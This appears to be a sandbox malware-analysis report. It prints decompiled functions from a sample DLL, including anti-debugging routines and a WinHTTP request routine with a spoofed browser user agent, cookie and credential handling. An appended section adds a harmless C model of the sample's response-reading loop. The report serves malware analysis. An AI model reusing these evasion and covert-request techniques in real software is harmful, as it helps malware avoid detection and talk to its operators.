                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                          • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                          • API String ID: 3653371871-801751246
                                                                                                                                                                          • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                          • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                                          • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                          • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10019D40() {
                                                                                                                                                                          				_Unknown_base(*)()* _v8;
                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                          
                                                                                                                                                                          				_v12 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                          				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
                                                                                                                                                                          				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
                                                                                                                                                                          			}






                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                                          • NtSetInformationThread.NTDLL(00000000,?,100206A1), ref: 10019D73
                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                                          • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                          • API String ID: 1707985920-1680533912
                                                                                                                                                                          • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                          • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A170(CHAR* _a4) {
                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                                          				intOrPtr _v328;
                                                                                                                                                                          				void* _v332;
                                                                                                                                                                          				void* _t11;
                                                                                                                                                                          
                                                                                                                                                                          				_v328 = 0;
                                                                                                                                                                          				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                                          				_v332 = _t11;
                                                                                                                                                                          				if(_v332 != 0xffffffff) {
                                                                                                                                                                          					_v328 = _v324.nFileSizeLow;
                                                                                                                                                                          				}
                                                                                                                                                                          				FindClose(_v332); // executed
                                                                                                                                                                          				return _v328;
                                                                                                                                                                          			}








                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                                          • FindClose.KERNELBASE(000000FF), ref: 1001A1B6
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                          • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                          • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                          • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                          			E10019FF0(void* __ecx) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          
                                                                                                                                                                          				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
                                                                                                                                                                          				return _v8;
                                                                                                                                                                          			}





                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3244773808-0
                                                                                                                                                                          • Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                                          • Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                                          • Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
• Opcode ID: 6644be1cfe33cbe183cb6949c1b90dbc9d742968ec06f111115033d9a9c31fb9
• Instruction ID: 3cd941ba13157734125547d1fc372db87dfbbb2a6798ae1d20b19e846ec71d3e
• Opcode Fuzzy Hash: 6644be1cfe33cbe183cb6949c1b90dbc9d742968ec06f111115033d9a9c31fb9
• Instruction Fuzzy Hash: 5BA1933A704B44DFEB16CE99C5D076577A2EB8EB64F34007AE907C7712DABAAC00D644

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 47%

E10021AF0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
	signed int _v8;
	intOrPtr _v16;
	char _v20;
	char _v24;
	char _v28;
	long _v32;
	char _v36;
	char _v40;
	long _v44;
	WCHAR* _v48;
	long _v52;
	short _v54;
	short _v58;
	short _v62;
	short _v66;
	short _v70;
	char _v72;
	long _v76;
	long _v80;
	intOrPtr _v84;
	long _v88;
	signed int _v92;
	intOrPtr _v96;
	intOrPtr _v100;
	intOrPtr _v104;
	intOrPtr _v108;
	char _v112;
	signed int _v116;
	char _v120;
	signed int _v124;
	long _v128;
	intOrPtr _v132;
	intOrPtr _v136;
	signed int _v140;
	char _v28334;
	char _v28336;
	intOrPtr _v28340;
	intOrPtr _v28344;
	char _v28862;
	short _v28864;
	long _v28868;
	long _v28872;
	long _v28876;
	intOrPtr _v28880;
	intOrPtr _v28884;
	char _v28912;
	char _v28940;
	long _v28944;
	intOrPtr _v28948;
	intOrPtr _v28952;
	intOrPtr _v28956;
	long _v28960;
	intOrPtr _v28964;
	intOrPtr _v28968;
	intOrPtr _v28972;
	intOrPtr _v28976;
	void* __ebp;
	long _t263;
	intOrPtr _t267;
	long _t268;
	signed int* _t276;
	long _t277;
	long _t279;
	long _t288;
	long _t292;
	long _t295;
	long _t298;
	long _t311;
	intOrPtr _t330;
	intOrPtr _t470;
	void* _t471;
	void* _t473;
	void* _t479;

	_t469 = __esi;
	_t468 = __edi;
	_t357 = __ebx;
	_push(0xffffffff);
	_push(E10022BD7);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t470;
	E10018AA0(0x7120);
	_v32 = 0;
	_v24 = 0;
	_v36 = 0;
	_v28 = 0;
	_v20 = 0x50;
	_v40 = 0;
	_t263 = E100211B0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
	_t471 = _t470 + 0x18;
	_v32 = _t263;
	if(_v32 == 0) {
		L66:
		 *[fs:0x0] = _v16;
		return _v32;
	} else {
		_v32 = 0;
		_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
		_v76 = E1001A370(__ebx, __edi, __esi, _v28);
		_t267 = E1001A370(__ebx, __edi, __esi, _v40);
		_t473 = _t471 + 8;
		_v84 = _t267;
		_v72 = 0;
		_v70 = 0;
		_v66 = 0;
		_v62 = 0;
		_v58 = 0;
		_v54 = 0;
		_t268 = _a20;
		_v28944 = _t268;
		if(_v28944 == 1) {
			_t268 = E1000E743(0,  &_v72, 0xa, L"GET");
			_t473 = _t473 + 0xc;
		} else {
			if(_v28944 > 1) {
				if(_v28944 <= 3) {
					_t268 = E1000E743( &_v72,  &_v72, 0xa, L"POST");
					_t473 = _t473 + 0xc;
				}
			}
		}
		_v88 = 0;
		_v44 = 0;
		_v80 = 0;
		_v52 = 0;
		__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
		_v44 = _t268;
		if(_v44 == 0) {
			L59:
			__eflags = _v52;
			if(_v52 != 0) {
				__imp__WinHttpCloseHandle(_v52);
			}
			__eflags = _v80;
			if(_v80 != 0) {
				__imp__WinHttpCloseHandle(_v80);
			}
			__eflags = _v44;
			if(__eflags != 0) {
				__imp__WinHttpCloseHandle(_v44);
			}
			_push(_v84);
			E1000CA30(_t357, _t468, _t469, __eflags);
			_push(_v76);
			E1000CA30(_t357, _t468, _t469, __eflags);
			_push(_v36);
			E1000CA30(_t357, _t468, _t469, __eflags);
			_push(_v28);
			E1000CA30(_t357, _t468, _t469, __eflags);
			_push(_v40);
			E1000CA30(_t357, _t468, _t469, __eflags);
			goto L66;
		}
		_t504 = _a4;
		if(_a4 != 0) {
			_v100 = E1001A370(_t357, _t468, _t469, _a4);
			_v112 = 3;
			_v108 = _v100;
			_v104 = 0x10024f9c;
			__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
			_push(_v100);
			E1000CA30(_t357, _t468, _t469, _t504);
			_t473 = _t473 + 8;
		}
		asm("sbb edx, edx");
		_v92 =  ~_a24 & 0x00000002;
		_t276 =  &_v92;
		__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
		_v96 = _t276;
		_t277 = _v76;
		__imp__WinHttpConnect(_v44, _t277, _v20, 0);
		_v80 = _t277;
		if(_v80 == 0) {
			goto L59;
		}
		_v116 = 0x100;
		if(_v24 != 0) {
			_v116 = _v116 | 0x00800000;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t279 = _v80;
                                                                                                                                                                          					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
                                                                                                                                                                          					_v52 = _t279;
                                                                                                                                                                          					if(_v52 == 0) {
                                                                                                                                                                          						goto L59;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						if(_a8 != 0) {
                                                                                                                                                                          							_t510 = _a12;
                                                                                                                                                                          							if(_a12 != 0) {
                                                                                                                                                                          								_v132 = E1001A370(_t357, _t468, _t469, _a8);
                                                                                                                                                                          								_v136 = E1001A370(_t357, _t468, _t469, _a12);
                                                                                                                                                                          								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
                                                                                                                                                                          								_push(_v132);
                                                                                                                                                                          								E1000CA30(_t357, _t468, _t469, _t510);
                                                                                                                                                                          								_push(_v136);
                                                                                                                                                                          								E1000CA30(_t357, _t468, _t469, _t510);
                                                                                                                                                                          								_t473 = _t473 + 0x10;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						_v120 = 4;
                                                                                                                                                                          						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
                                                                                                                                                                          						_v116 = _v116 | 0x00000100;
                                                                                                                                                                          						_v116 = _v116 | 0x00002000;
                                                                                                                                                                          						_v116 = _v116 | 0x00001000;
                                                                                                                                                                          						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
                                                                                                                                                                          						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
                                                                                                                                                                          						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
                                                                                                                                                                          						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
                                                                                                                                                                          						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
                                                                                                                                                                          						if(_a60 == 0) {
                                                                                                                                                                          							L22:
                                                                                                                                                                          							__eflags = _a28;
                                                                                                                                                                          							if(_a28 != 0) {
                                                                                                                                                                          								_v28340 = E1001A370(_t357, _t468, _t469, _a28);
                                                                                                                                                                          								_v28336 = 0;
                                                                                                                                                                          								E1000CF20(_t468,  &_v28334, 0, 0x6e1e);
                                                                                                                                                                          								E1000E743( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
                                                                                                                                                                          								E1000E6C9( &_v28336, 0x3710, _v28340);
                                                                                                                                                                          								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
                                                                                                                                                                          								_push(_v28340);
                                                                                                                                                                          								E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          								_t473 = _t473 + 0x2c;
                                                                                                                                                                          							}
                                                                                                                                                                          							_v28948 = _a20;
                                                                                                                                                                          							__eflags = _v28948 - 2;
                                                                                                                                                                          							if(_v28948 == 2) {
                                                                                                                                                                          								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
                                                                                                                                                                          							} else {
                                                                                                                                                                          								__eflags = _v28948 - 3;
                                                                                                                                                                          								if(_v28948 == 3) {
                                                                                                                                                                          									_v28864 = 0;
                                                                                                                                                                          									E1000CF20(_t468,  &_v28862, 0, 0x206);
                                                                                                                                                                          									_v28344 = E1001A370(_t357, _t468, _t469, _v48);
                                                                                                                                                                          									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
                                                                                                                                                                          									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
                                                                                                                                                                          									_push(_v28344);
                                                                                                                                                                          									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          									_t473 = _t473 + 0x20;
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
                                                                                                                                                                          							_v128 = 0;
                                                                                                                                                                          							_v124 = 0;
                                                                                                                                                                          							__eflags = _a20 - 3;
                                                                                                                                                                          							if(_a20 == 3) {
                                                                                                                                                                          								_v124 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
                                                                                                                                                                          								_v128 = L1000CE56(_t357, _v48, _t468, _t469, _v124);
                                                                                                                                                                          								E1000CF20(_t468, _v128, 0, _v124);
                                                                                                                                                                          								_t330 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
                                                                                                                                                                          								_t473 = _t473 + 0x58;
                                                                                                                                                                          								_v124 = _t330;
                                                                                                                                                                          							}
                                                                                                                                                                          							__eflags = _a20 - 3;
                                                                                                                                                                          							if(_a20 != 3) {
                                                                                                                                                                          								_v28952 = _a36;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v28952 = _v124;
                                                                                                                                                                          							}
                                                                                                                                                                          							__eflags = _a20 - 3;
                                                                                                                                                                          							if(_a20 != 3) {
                                                                                                                                                                          								_v28956 = _a36;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v28956 = _v124;
                                                                                                                                                                          							}
                                                                                                                                                                          							__eflags = _a20 - 3;
                                                                                                                                                                          							if(_a20 != 3) {
                                                                                                                                                                          								_v28960 = _a32;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v28960 = _v128;
                                                                                                                                                                          							}
                                                                                                                                                                          							_t288 = _v52;
                                                                                                                                                                          							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
                                                                                                                                                                          							_v88 = _t288;
                                                                                                                                                                          							__eflags = _v88;
                                                                                                                                                                          							if(_v88 == 0) {
                                                                                                                                                                          								L57:
                                                                                                                                                                          								__eflags = _v128;
                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                          									_push(_v128);
                                                                                                                                                                          									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          									_t473 = _t473 + 4;
                                                                                                                                                                          								}
                                                                                                                                                                          								goto L59;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								__imp__WinHttpReceiveResponse(_v52, 0); // executed
                                                                                                                                                                          								_v88 = _t288;
                                                                                                                                                                          								__eflags = _v88;
                                                                                                                                                                          								if(_v88 == 0) {
                                                                                                                                                                          									goto L57;
                                                                                                                                                                          								}
                                                                                                                                                                          								_v28868 = 0;
                                                                                                                                                                          								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
                                                                                                                                                                          								_t292 = GetLastError();
                                                                                                                                                                          								__eflags = _t292 - 0x7a;
                                                                                                                                                                          								if(_t292 == 0x7a) {
                                                                                                                                                                          									_v28884 = L1000CE56(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
                                                                                                                                                                          									__eflags = _v28868 + 2;
                                                                                                                                                                          									E1000CF20(_t468, _v28884, 0, _v28868 + 2);
                                                                                                                                                                          									_t311 = _v52;
                                                                                                                                                                          									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
                                                                                                                                                                          									_v88 = _t311;
                                                                                                                                                                          									_v28880 = E1001A400(_t357, _t468, _t469, _v28884);
                                                                                                                                                                          									_v28964 = E10001160( &_v28912, __eflags, _v28880);
                                                                                                                                                                          									_v28968 = _v28964;
                                                                                                                                                                          									_v8 = 0;
                                                                                                                                                                          									E10001A70(_a64, _v28968);
                                                                                                                                                                          									_v8 = 0xffffffff;
                                                                                                                                                                          									E100011A0( &_v28912);
                                                                                                                                                                          									_push(_v28880);
                                                                                                                                                                          									E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          									_push(_v28884);
                                                                                                                                                                          									_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          									_t473 = _t473 + 0x1c;
                                                                                                                                                                          								}
                                                                                                                                                                          								_v28876 = 0;
                                                                                                                                                                          								_v28872 = 0;
                                                                                                                                                                          								__eflags = _v88;
                                                                                                                                                                          								if(_v88 == 0) {
                                                                                                                                                                          									L56:
                                                                                                                                                                          									_v32 = _v88;
                                                                                                                                                                          									goto L57;
                                                                                                                                                                          								} else {
                                                                                                                                                                          									while(1) {
                                                                                                                                                                          										_v28868 = 0;
                                                                                                                                                                          										_t437 = _v52;
                                                                                                                                                                          										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868);
                                                                                                                                                                          										__eflags = _t292;
                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                          											break;
                                                                                                                                                                          										}
                                                                                                                                                                          										__eflags = _v28868;
                                                                                                                                                                          										if(_v28868 != 0) {
                                                                                                                                                                          											_t295 = L1000CE56(_t357, _t437, _t468, _t469, _v28868 + 1);
                                                                                                                                                                          											_t479 = _t473 + 4;
                                                                                                                                                                          											_v28876 = _t295;
                                                                                                                                                                          											__eflags = _v28876;
                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                          												E1000CF20(_t468, _v28876, 0, _v28868 + 1);
                                                                                                                                                                          												_t473 = _t479 + 0xc;
                                                                                                                                                                          												_t439 = _v28876;
                                                                                                                                                                          												_t298 = _v52;
                                                                                                                                                                          												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
                                                                                                                                                                          												__eflags = _t298;
                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                          													_push(GetLastError());
                                                                                                                                                                          													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
                                                                                                                                                                          													E1000E604(_t357, _t439, _t468, _t469, __eflags);
                                                                                                                                                                          													_t473 = _t473 + 8;
                                                                                                                                                                          												}
                                                                                                                                                                          												__eflags = _v28872;
                                                                                                                                                                          												if(__eflags != 0) {
                                                                                                                                                                          													_v28972 = E10001160( &_v28940, __eflags, _v28876);
                                                                                                                                                                          													_v28976 = _v28972;
                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                          													E10001A70(_a68, _v28976);
                                                                                                                                                                          													_v8 = 0xffffffff;
                                                                                                                                                                          													E100011A0( &_v28940);
                                                                                                                                                                          													_push(_v28876);
                                                                                                                                                                          													_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
                                                                                                                                                                          													_t473 = _t473 + 4;
                                                                                                                                                                          													__eflags = _v28868;
                                                                                                                                                                          													if(_v28868 > 0) {
                                                                                                                                                                          														continue;
                                                                                                                                                                          													}
                                                                                                                                                                          												} else {
                                                                                                                                                                          												}
                                                                                                                                                                          												goto L56;
                                                                                                                                                                          											}
                                                                                                                                                                          											_push("Out of memory.\n");
                                                                                                                                                                          											E1000E604(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                                          											_t473 = _t479 + 4;
                                                                                                                                                                          											goto L56;
                                                                                                                                                                          										}
                                                                                                                                                                          										goto L56;
                                                                                                                                                                          									}
                                                                                                                                                                          									_push(GetLastError());
                                                                                                                                                                          									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
                                                                                                                                                                          									E1000E604(_t357, _t437, _t468, _t469, __eflags);
                                                                                                                                                                          									_t473 = _t473 + 8;
                                                                                                                                                                          									goto L56;
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_v140 = 0;
                                                                                                                                                                          							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
                                                                                                                                                                          								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
                                                                                                                                                                          								_v140 = _v140 + 1;
                                                                                                                                                                          							}
                                                                                                                                                                          							goto L22;
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          			}
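The loop above is the sample's HTTP body reader: it calls WinHttpQueryDataAvailable, allocates one byte more than is reported (zero-filled, so the chunk is NUL-terminated), reads it with WinHttpReadData, appends the chunk to a string object and frees it, and stops only when zero bytes are reported as available or a read returns nothing. Two details matter for an analyst: a failed WinHttpReadData is logged with the wrong message ("WinHttpQueryDataAvailable failed ...") and the function still returns the success flag, so a truncated response is processed as a complete one. The following C is an added model of that control flow, not code from the sample or from the report; the FakeRequest handle, fake_QueryDataAvailable and fake_ReadData are constructed stand-ins for the two WinHttp calls so it runs off Windows, and the request bodies are made up.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for a WinHttp request handle: a fixed in-memory body
 * served in chunks of `chunk` bytes. fail_read_at = -1 never fails; otherwise
 * the N-th (0-based) read fails with 0 bytes, as WinHttpReadData does on error. */
typedef struct {
    const unsigned char *body;
    size_t len, pos, chunk;
    int fail_read_at, reads;
} FakeRequest;

static int fake_QueryDataAvailable(FakeRequest *h, unsigned long *avail) {
    size_t left = h->len - h->pos;
    *avail = (unsigned long)(left < h->chunk ? left : h->chunk);
    return 1;
}

static int fake_ReadData(FakeRequest *h, void *buf, unsigned long want, unsigned long *got) {
    if (h->fail_read_at >= 0 && h->reads++ == h->fail_read_at) { *got = 0; return 0; }
    size_t left = h->len - h->pos;
    size_t take = want < left ? want : left;
    memcpy(buf, h->body + h->pos, take);
    h->pos += take;
    *got = (unsigned long)take;
    return 1;
}

/* Growable byte buffer standing in for the string object the sample appends to
 * through E10001A70(_a68, ...). */
typedef struct { unsigned char *p; size_t len; } ByteBuf;

static int bytebuf_append(ByteBuf *b, const unsigned char *src, size_t n) {
    unsigned char *np = realloc(b->p, b->len + n + 1);
    if (!np) return 0;
    memcpy(np + b->len, src, n);
    b->p = np; b->len += n; b->p[b->len] = 0;
    return 1;
}

/* The read loop as the decompiled code does it: query available bytes, allocate
 * avail+1 zeroed bytes, read, append, free; repeat until 0 bytes are available.
 * Returns 1 on every path the sample treats as success (its L56 with _v88 != 0),
 * 0 only when allocation fails. A failed read ends the loop but keeps the success
 * return, so the caller cannot tell a truncated body from a complete one. */
int drain_body(FakeRequest *h, ByteBuf *out, const char **log) {
    *log = NULL;
    for (;;) {
        unsigned long avail = 0, got = 0;
        if (!fake_QueryDataAvailable(h, &avail)) {
            *log = "WinHttpQueryDataAvailable failed";
            return 1;                                 /* still "success" in the sample */
        }
        if (avail == 0) return 1;                     /* end of body */
        unsigned char *chunk = calloc(avail + 1, 1);  /* avail+1, zero-filled: NUL-terminated copy */
        if (!chunk) { *log = "Out of memory."; return 0; }
        if (!fake_ReadData(h, chunk, avail, &got)) {
            /* The sample prints "WinHttpQueryDataAvailable failed" on this branch even
             * though WinHttpReadData is what failed, and it never frees the chunk here.
             * The misleading label is kept; the leak is not reproduced. */
            *log = "WinHttpQueryDataAvailable failed (actually WinHttpReadData)";
        }
        if (got == 0) { free(chunk); return 1; }      /* failed or empty read: stop, keep what was read */
        int ok = bytebuf_append(out, chunk, got);
        free(chunk);
        if (!ok) { *log = "Out of memory."; return 0; }
    }
}

/* Convenience wrapper: drain `body` with a given chunk size and an optional injected
 * read failure; copies the result into `out` and returns the number of bytes drained. */
size_t demo_drain(const char *body, size_t chunk, int fail_read_at, char *out, size_t cap) {
    FakeRequest h = { (const unsigned char *)body, strlen(body), 0, chunk, fail_read_at, 0 };
    ByteBuf buf = { NULL, 0 };
    const char *log = NULL;
    drain_body(&h, &buf, &log);
    size_t n = buf.len < cap - 1 ? buf.len : cap - 1;
    memcpy(out, buf.p ? buf.p : (const unsigned char *)"", n);
    out[n] = 0;
    if (log) fprintf(stderr, "log: %s\n", log);
    free(buf.p);
    return buf.len;
}

int main(void) {
    char out[128];
    size_t n = demo_drain("id=1234&os=win10&ver=1", 8, -1, out, sizeof out);
    printf("drained %zu bytes: %s\n", n, out);
    n = demo_drain("id=1234&os=win10&ver=1", 8, 1, out, sizeof out);  /* second read fails */
    printf("truncated to %zu bytes (still reported as success): %s\n", n, out);
    return 0;
}
```

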